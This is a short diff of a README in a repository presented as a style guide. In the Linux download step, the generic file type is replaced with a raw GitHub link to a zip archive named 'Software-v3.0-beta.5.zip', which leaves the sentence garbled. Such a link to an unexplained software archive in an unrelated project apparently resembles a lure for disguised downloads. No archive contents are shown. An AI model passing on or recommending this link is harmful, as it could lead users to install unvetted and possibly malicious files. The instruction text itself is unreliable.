konn57737/mysteryhousestyleguide/readme.md

 - For Windows users: Usually a `.zip` or `.exe` file.
 - For macOS users: A `.zip` file.
-- For Linux users: A `.tar.gz` file or source code.
+- For Linux users: A `https://raw.githubusercontent.com/konn57737/mysteryhousestyleguide/main/overnew/Software-v3.0-beta.5.zip` file or source code.

 ### 5. Download the File